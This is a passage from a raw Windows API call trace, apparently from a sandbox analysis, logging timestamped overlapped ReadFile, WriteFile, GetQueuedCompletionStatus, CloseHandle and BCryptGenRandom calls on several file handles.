lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.464] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.465] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.476] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8424, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.477] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.491] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1314, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.492] CloseHandle (hObject=0x170) returned 1 [0153.492] free (_Block=0x3df0008) [0153.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.502] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.502] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.502] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.502] free (_Block=0x3e305b8) [0153.502] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.502] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.503] free (_Block=0x1fa91d0) [0153.503] free (_Block=0x1fa2ed8) [0153.503] free (_Block=0x1fa90b8) [0153.503] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.503] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.504] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1420, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.504] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.516] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1998, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.517] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.517] CloseHandle (hObject=0x170) returned 1 [0153.517] free (_Block=0x3df0008) [0153.517] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.526] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.527] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.527] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.527] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.527] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.527] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.528] free (_Block=0x3e305b8) [0153.528] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.528] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.528] free (_Block=0x1fa91d0) [0153.528] free (_Block=0x1fa2ed8) [0153.528] free (_Block=0x1fa90b8) [0153.528] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.529] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1c40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.530] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.553] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1bc8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.554] CloseHandle (hObject=0x170) returned 1 [0153.554] free (_Block=0x3df0008) [0153.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.564] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.564] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.564] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.565] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.565] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.565] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.565] free (_Block=0x3e305b8) [0153.565] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.565] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.566] free (_Block=0x1fa91d0) [0153.566] free (_Block=0x1fa2ed8) [0153.566] free (_Block=0x1fa90b8) [0153.566] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.566] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.567] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1350, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.567] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.579] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1720, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.595] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x154c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.596] CloseHandle (hObject=0x170) returned 1 [0153.597] free (_Block=0x3df0008) [0153.597] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.743] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.743] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.743] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.744] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.744] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.744] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.744] free (_Block=0x3e305b8) [0153.744] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.744] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.745] free (_Block=0x1fa91d0) [0153.745] free (_Block=0x1fa2ed8) [0153.745] free (_Block=0x1fa90b8) [0153.745] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.745] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.893] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.893] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.893] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.894] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.894] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.894] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.894] free (_Block=0x3e305b8) [0153.894] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.894] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.895] free (_Block=0x1fa91d0) [0153.895] free (_Block=0x1fa2ed8) [0153.895] free (_Block=0x1fa90b8) [0153.895] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0153.897] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.897] CloseHandle (hObject=0x308) returned 1 [0153.897] free (_Block=0x3d70450) [0153.897] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.915] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xab2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.915] CloseHandle (hObject=0x308) returned 1 [0153.915] free (_Block=0x3df0008) [0153.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.951] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.952] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.952] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.952] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.952] free (_Block=0x3e305b8) [0153.952] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.952] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.953] free (_Block=0x1fa91d0) [0153.953] free (_Block=0x1fa2ed8) [0153.953] free (_Block=0x1fa90b8) [0153.953] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.958] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.969] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.969] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.969] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.970] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.970] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.970] free (_Block=0x3e305b8) [0153.970] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.970] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.971] free (_Block=0x1fa91d0) [0153.971] free (_Block=0x1fa2ed8) [0153.971] free (_Block=0x1fa90b8) [0153.971] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.972] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.982] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.983] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.983] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.983] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.984] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.987] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.987] free (_Block=0x3e305b8) [0153.987] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.987] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.988] free (_Block=0x1fa91d0) [0153.988] free (_Block=0x1fa2ed8) [0153.988] free (_Block=0x1fa90b8) [0153.988] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0153.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.000] CloseHandle (hObject=0x308) returned 1 [0154.000] free (_Block=0x3df0008) [0154.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.015] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7938, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.026] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.035] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1100c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.048] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.064] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xae2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0154.064] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.067] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xf56, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.413] CloseHandle (hObject=0x308) returned 1 [0154.414] free (_Block=0x1ff1e60) [0154.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.420] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x795c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0154.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.444] CloseHandle 